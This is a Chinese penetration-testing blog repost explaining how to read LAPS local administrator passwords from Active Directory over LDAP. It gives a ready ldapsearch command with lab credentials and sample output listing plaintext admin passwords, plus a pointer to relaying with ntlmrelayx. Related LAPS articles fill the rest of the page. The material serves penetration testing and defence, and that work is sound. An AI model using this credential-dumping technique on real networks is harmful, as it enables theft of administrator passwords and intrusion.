域渗透TIPS:获取LAPS管理员密码

最新推荐文章于 2023-10-05 22:56:34 发布
最新推荐文章于 2023-10-05 22:56:34 发布
阅读量522 收藏 3
点赞数
文章标签: ldap python
原文链接:https://yq.aliyun.com/articles/180983
版权

域渗透TIPS:获取LAPS管理员密码

如果你之前有对启用LAPS机制的主机进行渗透测试,那么你应该能体会到该机制的随机化本地管理员密码是有多么令人痛苦。

LAPS将其信息存储在活动目录:

  • 存储密码过期时间:ms-Mcs-AdmPwdExpirationTime: 131461867015760024
  • 以明文显示的存储密码:ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

LAPS早期版本中,任何用户都能够读取活动目录中的内容。还好微软已经修复,目前你必须获得该对象的所有扩展权限或者是完全控制权限才能够进行访问。

域渗透TIPS:获取LAPS管理员密码

在复杂的真实环境中,内网主机中还可能存在隐藏的OU权限管理员,甚至是拥有完全控制权限的,负责特定用户组的一个标准用户。

得益于Meatballs开发的Metasploit模块:

https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_laps.rb 帮助我们完成了这项工作。但是我们不可能每次都特地打开一个Meterpreter会话来运行该模块吧?

使用ldapsearch(包含在Debian/Ubuntu的ldapscripts程序包中)可以被用来构造与该模块相同的请求,以下便是一个例子:

 
 
  1. ldapsearch -x -h 192.168.80.10 -D \ 
  2. "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" \ 
  3. "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 
 
 
解析:
 
 
  • -x – 使用基础身份验证
  • -h 192.168.80.10 – 将ldap连接到域控制器
  • -D “helpdesk” -w ASDqwe123 – 以用户名helpdesk,密码ASDqwe123进行登录
  • -b “dc=sittingduck,dc=info” – 加载整个域的基础LDAP对象
  • “(ms-MCS-AdmPwd=*)” – 过滤掉所有不能查看的ms-MCS-AdmPwd值 (只要拥有足够的权限,甚至还可以获取Administrator密码)
  • ms-MCS-AdmPwd – 仅显示ms-MCS-AdmPwd对象 (默认包含对象名以及DN,所以你还是能知道主机从属关系)
 
 
运行情况如下:
 
 
 
 
  1. $ ldapsearch -x -h 192.168.80.10 -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 
  2. # extended LDIF 
  4. # LDAPv3 
  5. # base <dcdc=sittingduck,dc=info> with scope subtree 
  6. # filter: (ms-MCS-AdmPwd=*) 
  7. # requesting: ms-MCS-AdmPwd 
  9.  
  10. # DC1, Domain Controllers, sittingduck.info 
  11. dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info 
  12. ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F 
  13.  
  14. # SDCLIENT_DAWIN7, LabComputers, Lab, sittingduck.info 
  15. dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info 
  16. ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR 
  17.  
  18. # SD_WSUS_2012, LabComputers, Lab, sittingduck.info 
  19. dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info 
  20. ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T 
  21.  
  22. # WIN-PM0ID6F0AHN, LabComputers, Lab, sittingduck.info 
  23. dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info 
  24. ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#( 
  25.  
  26. # search reference 
  27. ref: ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info 
  28.  
  29. # search reference 
  30. ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,D 
  31.  C=info 
  32.  
  33. # search reference 
  34. ref: ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,D 
  35.  C=info 
  36.  
  37. # search reference 
  38. ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info 
  39.  
  40. # search result 
  41. search: 2 
  42. result: 0 Success 
 
 
至从获得本地管理员密码,但还没有确定该帐号是否启用,你可以使用Kerberos进行身份验证。由于Windows中域控制器对LDAP连接不会要求证书验证(据我所知),你只需在ntlmrelayx.py进行一些小修改就能转储LAPS密码了。
 
 
作者:鸢尾
 来源:51CTO
 


                

        

        




    




    

      

        

            

              
                
                  weixin_34037173
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    3
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
LAPM:本地管理员密码维护者

				
			

			

				

					05-29
				

			

		

		

			
				
本地管理员密码维护者(2015 年 6 月 18 日:微软的 LAPS(本地管理员密码解决方案)最近受到了很多关注,所以我想我应该开源我三个月前通过我的博客发布的版本。) Active Directory 非常适合对大量 IT 资产进行...

			
		

	



                

              
                



	

		

			

				
					
使用 LAPS WebUI 从 Active Directory 检索本地管理员密码

				
			

			

				

					allway2的博客
				

				

					05-16
					
					700
					
				

			

		

		

			
				
作为安全说明,LAPS WebUI 的 Docker 实现不会在 Web 浏览器中配置 HTTPS 的连接。因此,您需要在解决方案前面放置一个反向代理,例如 Traefik,以确保您的浏览器流量已加密,或者您的密码将以明文形式发送。您需要使用具有查看 LAPS 控制的工作站所在的 OU 对象的扩展属性的 Active Directory 用户登录。安装 LAPS UI 后,可以查询特定工作站以查看当前 LAPS 控制的密码。登录后,您可以搜索 LAPS 控制的工作站并查看密码

			
		

	



                


  
              

                


	

		

			

				
					
【Windows】Windows LAPS:本地管理员密码解决方案

				
			

			

				

					u012153104的博客
				

				

					05-06
					
					1641
					
				

			

		

		

			
				
微软已经在2023年4月的安全更新中,为Windows 10(20H2、21H2、22H2)、Windows 11(21H2、22H2)、Windows Server 2019和Windows Server 2022提供了称为Windows LAPS的新功能。Windows 本地管理员密码解决方案 (Windows LAPS) 是一项 Windows 功能,可自动管理和备份已加入 Azure Active Directory 或已加入 Windows Server Active Directory 的设备。

			
		

	





	

		

			

				
					
内计算机本地管理员密码管理

				
			

			

				

					weixin_42556618的博客
				

				

					12-17
					
					3830
					
				

			

		

		

			
				
随着互联网技术的不断发现,信息安全在企业中的受重视度也越来越高,终端管理是信息安全中至关重要的一环,不可能要求终端用户和服务器管理员有着一样的安全隐患意识和技术水平,因此在终端管理员层如何制定完善终端管理的制度和利用现有的技术来规范用户行为至关重要。其中做好权限的管理是重中之重,而企业内终端的密码管理则是权限管理的基础。

在小型企业中,PC客户端直接使用客户端,这种方式终端上需要管理的密码只有工...

			
		

	



		

			
		



	

		

			

				
					
bat  本机管理员密码_渗透——Local Administrator Password Solution

				
			

			

				

					weixin_39645041的博客
				

				

					11-23
					
					512
					
				

			

		

		

			
				
0x00 前言在渗透中,有关内主机的本地管理员的安全介绍还很少,对于LAPS大都比较陌生,所以这次就和我一起学习一下吧。0x01 简介在实际的环境中,内主机的本地管理员账户往往被忽视,再加上统一的配置,内主机的本地管理员密码往往相同,这就带来了一个问题,如果获得一台内主机的本地管理员密码,其他内主机的本地管理员密码自然就知道了,解决这个问题最好的办法就是确保每台内主机有不同的密码,...

			
		

	





	

		

			

				
					
如何搭建LAPS?如何统一给的电脑设置本地管理员密码?比组策略推送脚本更改本地管理员密码更好的方式?LAPS的好处特点?

				
			

			

				

					封枫丰
				

				

					07-28
					
					1142
					
				

			

		

		

			
				
1,如何搭建LAPS?
2.如何统一给的电脑设置本地管理员密码?
3,比组策略推送脚本更改本地管理员密码更好的方式?
4.LAPS的好处特点?

			
		

	





	

		

			

				
					
Windows AD 环镜 本地管理员密码解决方案(LAPS)部署

				
			

			

				

					一直被模仿,从未被超越
				

				

					05-08
					
					2370
					
				

			

		

		

			
				
这个功能实现的是让加的客户端本地administrator账号密码随机化(每一台都不一样的复杂随机密码),并且随机化密码存储在AD上可以查询到,避免***者猜出一台就等于猜出一片,从客户端到服务器的传输过程采用Kerberos v5和AES保护。LAPS允许您在加入的情况下管理本地管理员密码(随机,唯一且定期更改)电脑。(5)进入到 计算机配置>策略>软件设置>软件安装,为客户端安装LAPS,安装包就是上面下载的。1、在控上安装LAPS.x64,点击下一步安装,第一项不用安装。

			
		

	





	

		

			

				
					
SharpLAPS:从LDAP检索LAPS密码

				
			

			

				

					03-04
				

			

		

		

			
				
 要求(两者皆有): 具有ExtendedRight或Generic All Rights帐户管理员权限用法 _____ __ __ ___ ____ _____ / ___// /_ ____ __________ / / / | / __ \/ ___/ \__ \/ __ \/ __ `/ ___/ __ \/ / / /| | / /_/ /\...

			
		

	





	

		

			

				
					
laps-web:一个网站,用于管理对由Microsoft LAPS管理的本地管理员密码的访问

				
			

			

				

					04-28
				

			

		

		

			
				
 管理员无需安装自定义软件,也无需访问AD管理工具即可访问LAPS密码。 只需提供计算机名称,如果有访问权限,就会显示密码LAPS管理员还可以选择在访问密码时强制终止时间。 这样可确保在使用后旋转密码。 审核...

			
		

	





	

		

			

				
					
LAPS-WebUI:一个用于LAPS的简单易用的Web界面(本地管理员密码解决方案)

				
			

			

				

					05-14
				

			

		

		

			
				
 一个用于LAPS的简单易用的Web界面(本地管理员密码解决方案) 设置前提 安装了Microsoft LAPS的有效Active Directory  .NET Core 5.0兼容操作系统(Ubuntu / Debian / CentOS / Alpine Linux / Windows / macOS)或...

			
		

	





	

		

			

				
					
管理员密码解除方法二则

				
			

			

				

					12-07
				

			

		

		

			
				
DC管理员密码丢失的情况很少见,很多管理员根本就碰不到这种情况,出现这种情况下大多数处理方法是重做控。这里提供的是不需重做控的DC管理员密码恢复方法,但需针对实际情况修改脚本内容。
在此二种针对WINDOWS 2003密码丢失,提供的破解恢复的方法,经实际在DELL2950及HP服务器上测试均能够破解win2003控的管理员密码,修改里面的批处理文件可破解指定的用户的密码(含修改过用户名的管理员帐户)!但需有权限进入机房并在有授权对控进行操作的条件下进行密码恢复。
  具体用法,请查看压缩包里的文档说明,所用的软件和方法是参考网络上资料,对于原资料出处没有记录,请谅解。如对此方法用到的批处理有疑问可发邮件给我。

			
		

	





	

		

			

				
					
LAPS-for-macOS:用于检索 LAPS AD 密码的 macOS 应用程序

				
			

			

				

					05-29
				

			

		

		

			
				
 只需输入计算机名称并通过单击获取密码来提取密码。 您还可以通过单击重置密码重置密码,该密码将设置为 2001 年 1 月 1 日的到期日期  由Flaticon 的Freepik 制作的图标已由Creative Commons BY 3.0许可-http   

			
		

	





	

		

			

				
					
(LAPS) Windows本地管理员密码解决方案

					
最新发布

				
			

			

				

					IT 博客
				

				

					10-05
					
					299
					
				

			

		

		

			
				
Windows Local Administrator Password Solution (LAPS)Windows本地管理员密码解决方案

			
		

	





	

		

			

				
					
使用AD管理您的本地计算机密码

				
			

			

				

					Zephyr的博客
				

				

					04-02
					
					6406
					
				

			

		

		

			
				
此方案是将本地管理员密码存储在LDAP上,作为计算机账户的一个机密属性,配合GPO,实现自动定期修改密码、设置密码长度、强度等,然后配置某些指的账号,能查看存储的密码,如果用户需要,可以用PowerShell或指的工具查询密码,但对非授权用户,确无法获取,从而实现本机管理员的自动化管理。

			
		

	





	

		

			

				
					
LAPS本地管理员密码之使用PowerShell查看和重置密码

				
			

			

				

					一个标题
				

				

					12-26
					
					1927
					
				

			

		

		

			
				
LAPS本地管理员密码之使用PowerShell查看和重置密码

			
		

	





	

		

			

				
					
本地管理员密码解决方案 Local Admin Password Solution (LAPS)

				
			

			

				

					weixin_33748818的博客
				

				

					10-20
					
					5143
					
				

			

		

		

			
				
据调查,大多数的企业在部署AD后,针对客户端电脑的本机管理员采用以下几种方式管理方式:1. 禁用本机管理员,只使用账登录;但存在的问题是:当电脑因故障脱离,或是无法使用账号登录时,电脑就无法登录,需要借助PE等工具启用本机管理员并设置密码。2. 由IT人员在系统部署时设置一个统一的本机管理员密码(或是用GPO统一设置);但存在的问题是:如果密码一旦泄露或是被猜出,***、病毒将能取得电脑控...

			
		

	





	

		

			

				
					
部署Microsoft LAPS分步指南

				
			

			

				

					allway2的博客
				

				

					01-13
					
					5773
					
				

			

		

		

			
				
部署Microsoft LAPS分步指南

在本文档中,我将向您逐步介绍部署Microsoft LAPS的方法。本地管理员密码解决方案(LAPS)提供对加入的计算机的本地帐户密码的管理。实施LAPS后,密码将存储在Active Directory(AD)中并受ACL保护,因此只有合格的用户才能读取或请求重置。对于要求用户在没有凭据的情况下登录计算机的环境,密码管理可能会成为一个复杂的问题。本地...

			
		

	





	

		

			

				
					
计算机管理员密码保护,本地管理员密码解决方案(LAPS)简介

				
			

			

				

					weixin_35555531的博客
				

				

					07-11
					
					1085
					
				

			

		

		

			
				
本地管理员帐户密码管理编制人杰里·福尔马切克本地管理员密码管理数据表出版:2015年6月上次更新时间:2018年6月作者:JiriFrmacek,微软摘要:本文档简要概述了本地管理员密码解决方案(LAPS)版权所有©2015MicrsftCrpratin。保留所有权利。一、概述本地管理员解决方案自动管理加入的计算机上的本地管理员密码,因此密码为: 在每台受管计算机上唯一 随机生成 安全地存储在A...

			
		

	





	

		

			

				
					
如何使用laps 读取密码

				
			

			

				

					05-30
				

			

		

		

			
				
LAPS(局管理员密码解决方案)是微软提供的一种管理本地管理员密码的解决方案。它可以自动为每个计算机生成一个唯一的本地管理员密码,并将其存储在 Active Directory 中,只有授权的用户才能查看密码。如果您有...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值